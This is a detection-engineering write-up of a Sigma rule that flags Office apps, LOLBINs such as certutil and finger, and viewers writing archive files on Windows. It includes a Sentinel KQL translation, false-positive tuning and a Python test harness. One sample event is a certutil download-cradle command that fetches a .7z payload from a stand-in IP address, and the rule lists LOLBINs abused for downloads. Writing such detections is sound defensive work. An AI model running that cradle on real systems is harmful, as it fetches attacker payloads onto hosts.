An archive written to disk by a program that has no business creating one, an Office application, a download-capable LOLBIN such as certutil, or a plain viewer like notepad or Acrobat Reader, is a strong sign that a macro, a download cradle or an injected process is staging a payload or packaging data for exfiltration. The rule below keys on the writing process rather than on the file's location, so it catches this regardless of where the archive lands. SOC teams can run the Microsoft Sentinel (formerly Azure Sentinel) translation as a hunting query to find such writes before the archive is extracted or sent out.
Detection Rule
title: Legitimate Application Dropped Archive
id: 654fcc6d-840d-4844-9b07-2c3300e54a26
status: test
description: Detects programs on a Windows system that should not write an archive to disk
references:
    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth
date: 2022-08-21
tags:
    - attack.defense-evasion
    - attack.t1218
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith:
            # Microsoft Office programs that have no reason to write an archive
            - \winword.exe
            - \excel.exe
            - \powerpnt.exe
            - \msaccess.exe
            - \mspub.exe
            - \eqnedt32.exe
            - \visio.exe
            - \wordpad.exe
            - \wordview.exe
            # LOLBINs that can be used to download files
            - \certutil.exe
            - \certoc.exe
            - \CertReq.exe
            # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
            - \Desktopimgdownldr.exe
            - \esentutl.exe
            # - \expand.exe
            - \finger.exe
            # Executables that should never write an archive to disk (but may after a previous process injection, or if it's malware using a legitimate name)
            - \notepad.exe
            - \AcroRd32.exe
            - \RdrCEF.exe
            - \mshta.exe
            - \hh.exe
        TargetFilename|endswith:
            - '.zip'
            - '.rar'
            - '.7z'
            - '.diagcab'
            - '.appx'
    condition: selection
falsepositives:
    - Unknown
level: high
Azure Sentinel Query (ASIM imFileEvent)
imFileEvent
// Sigma 'Image' is the process that wrote the file, which ASIM carries in
// ActingProcessName. Matching the image list against TargetFilePath (as the
// original translation did) can never fire: one path cannot end in both an
// .exe name and an archive extension.
| where (ActingProcessName endswith "\\winword.exe"
    or ActingProcessName endswith "\\excel.exe"
    or ActingProcessName endswith "\\powerpnt.exe"
    or ActingProcessName endswith "\\msaccess.exe"
    or ActingProcessName endswith "\\mspub.exe"
    or ActingProcessName endswith "\\eqnedt32.exe"
    or ActingProcessName endswith "\\visio.exe"
    or ActingProcessName endswith "\\wordpad.exe"
    or ActingProcessName endswith "\\wordview.exe"
    or ActingProcessName endswith "\\certutil.exe"
    or ActingProcessName endswith "\\certoc.exe"
    or ActingProcessName endswith "\\CertReq.exe"
    or ActingProcessName endswith "\\Desktopimgdownldr.exe"
    or ActingProcessName endswith "\\esentutl.exe"
    or ActingProcessName endswith "\\finger.exe"
    or ActingProcessName endswith "\\notepad.exe"
    or ActingProcessName endswith "\\AcroRd32.exe"
    or ActingProcessName endswith "\\RdrCEF.exe"
    or ActingProcessName endswith "\\mshta.exe"
    or ActingProcessName endswith "\\hh.exe")
    and (TargetFileName endswith ".zip"
    or TargetFileName endswith ".rar"
    or TargetFileName endswith ".7z"
    or TargetFileName endswith ".diagcab"
    or TargetFileName endswith ".appx")
The selection is keyed on the process that writes the file (Image in Sigma, ActingProcessName in imFileEvent), so routine archive activity by backup agents, PowerShell, Windows Update or build agents does not match the rule as written: none of those images is in the list. The scenarios below only produce alerts if the image list is widened to cover them. When it is, express the exclusion on fields a file-creation event actually carries (the acting process image, its command line, the target path); neither Sysmon Event ID 11 nor imFileEvent records the parent process, a job name or a build ID.
Scenario: A Veeam Backup & Replication job temporarily writes a .zip archive to disk while it runs.
Filter/Exclusion: No hit as written, since veeam.exe is not a listed image. If backup agents are added to the list, exclude on the agent's ActingProcessName or on the repository path in TargetFilePath; the backup job name or task ID is not part of the file event and cannot be filtered on.
Scenario: A scheduled PowerShell script archives log files daily with Compress-Archive and writes the result to a temporary directory.
Filter/Exclusion: No hit as written, since powershell.exe is not a listed image. If it is added, exclude on ActingProcessCommandLine containing Compress-Archive together with the script path, not on execution time alone, which an attacker can trivially match.
Scenario: Windows Update extracts an update package and creates temporary archive files in the system temp directory.
Filter/Exclusion: No hit as written: the servicing processes are not listed, and a parent-process filter on svchost.exe is not possible because the file event does not carry the parent. If servicing binaries are added to the list, exclude on their ActingProcessName combined with a TargetFilePath under the Windows temp directory.
Scenario: A database administrator exports a database to a .bak file from SQL Server Management Studio.
Filter/Exclusion: Out of scope: .bak is not one of the watched extensions and sqlservr.exe is not a listed image, so no exclusion is needed.
Scenario: A CI/CD pipeline (Jenkins, Azure DevOps) packages build artifacts into an archive.
Filter/Exclusion: No hit as written, since the build agent is not a listed image. If it is added, exclude on the agent's ActingProcessName and on the workspace or artifact staging path in TargetFilePath; a build ID or artifact name is not a field of the file event.
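As an added worked example, not code from the original page or from the Sigma project, the selection of the rule above and the exclusion approach from the false-positive list are re-implemented in Python and run over constructed imFileEvent-style records. The field names (ActingProcessName, ActingProcessCommandLine, TargetFilePath, TargetFileName) follow the ASIM FileEvent schema; every record, command line and path is made up for the example. It shows which events the rule fires on, that matching the image list against TargetFilePath yields nothing, and that a Compress-Archive exclusion only changes the result once powershell.exe is added to the image list.

```python
"""Selection of the 'Legitimate Application Dropped Archive' rule, re-implemented
in Python and run over constructed imFileEvent-style records.

Added example, not code from the original page or from the Sigma project.
Field names follow the ASIM FileEvent schema; every record in EVENTS is
constructed for this example and is not real telemetry.
"""
from typing import Callable, Iterable, List

# Image suffixes from the rule's Image|endswith list and the extensions from
# TargetFilename|endswith. KQL 'endswith' is case-insensitive, so both sides
# are lower-cased before comparison.
IMAGES = (
    "\\winword.exe", "\\excel.exe", "\\powerpnt.exe", "\\msaccess.exe",
    "\\mspub.exe", "\\eqnedt32.exe", "\\visio.exe", "\\wordpad.exe",
    "\\wordview.exe", "\\certutil.exe", "\\certoc.exe", "\\CertReq.exe",
    "\\Desktopimgdownldr.exe", "\\esentutl.exe", "\\finger.exe",
    "\\notepad.exe", "\\AcroRd32.exe", "\\RdrCEF.exe", "\\mshta.exe", "\\hh.exe",
)
ARCHIVE_EXTS = (".zip", ".rar", ".7z", ".diagcab", ".appx")


def endswith_any(value: str, suffixes: Iterable[str]) -> bool:
    """Case-insensitive suffix match, mirroring KQL 'endswith'."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def matches(event: dict, images=IMAGES, process_field: str = "ActingProcessName") -> bool:
    """The Sigma selection: writing process in the image list AND target file
    name carrying an archive extension. process_field is a parameter only so
    the effect of matching the wrong field can be demonstrated."""
    return (endswith_any(event.get(process_field, ""), images)
            and endswith_any(event.get("TargetFileName", ""), ARCHIVE_EXTS))


def run(events: Iterable[dict], images=IMAGES,
        process_field: str = "ActingProcessName",
        exclusions: Iterable[Callable[[dict], bool]] = ()) -> List[str]:
    """Target file names of the events that match the selection and that no
    exclusion predicate suppresses."""
    exclusions = tuple(exclusions)
    return [e["TargetFileName"] for e in events
            if matches(e, images, process_field)
            and not any(excl(e) for excl in exclusions)]


def ev(process: str, cmdline: str, path: str) -> dict:
    """Build a minimal FileCreated record shaped like an imFileEvent row."""
    return {"EventType": "FileCreated", "ActingProcessName": process,
            "ActingProcessCommandLine": cmdline, "TargetFilePath": path,
            "TargetFileName": path.rsplit("\\", 1)[-1]}


# Constructed sample events (hypothetical hosts, users and paths).
EVENTS = [
    # Word opening a macro document that unpacks a staged archive: hit.
    ev(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
       "WINWORD.EXE /n C:\\Users\\alice\\Downloads\\invoice.docm",
       r"C:\Users\alice\AppData\Local\Temp\inv.zip"),
    # certutil used as a download cradle for a 7z payload: hit.
    ev(r"C:\Windows\System32\certutil.exe",
       "certutil -urlcache -split -f http://192.0.2.10/p.7z p.7z",
       r"C:\Users\alice\Downloads\p.7z"),
    # mshta writing an .appx package: hit.
    ev(r"C:\Windows\System32\mshta.exe", "mshta.exe C:\\Users\\alice\\x.hta",
       r"C:\Users\alice\AppData\Local\Temp\bundle.appx"),
    # Listed image, but a text file rather than an archive: no hit.
    ev(r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt",
       r"C:\Users\alice\Documents\notes.txt"),
    # Scheduled log rotation: an archive, but powershell.exe is not a listed image.
    ev(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       "powershell.exe -NoProfile -Command Compress-Archive -Path C:\\logs\\* "
       "-DestinationPath C:\\ops\\archive\\logs.zip",
       r"C:\ops\archive\logs.zip"),
]


def compress_archive(e: dict) -> bool:
    """Exclusion from the false-positive list: command line runs Compress-Archive."""
    return "compress-archive" in e.get("ActingProcessCommandLine", "").lower()


if __name__ == "__main__":
    print("rule as written:                ", run(EVENTS))
    print("image list matched on TargetFilePath:", run(EVENTS, process_field="TargetFilePath"))
    print("with Compress-Archive exclusion:", run(EVENTS, exclusions=[compress_archive]))
    widened = IMAGES + ("\\powershell.exe",)
    print("powershell.exe added to list:   ", run(EVENTS, images=widened))
    print("  ... plus the exclusion:       ", run(EVENTS, images=widened, exclusions=[compress_archive]))
```

Running the file prints the five result sets. The run helper takes the image list, the field it is matched against and a list of exclusion predicates, so the same harness can be used to check a tuning change against a handful of known-good and known-bad events before it goes into the production rule.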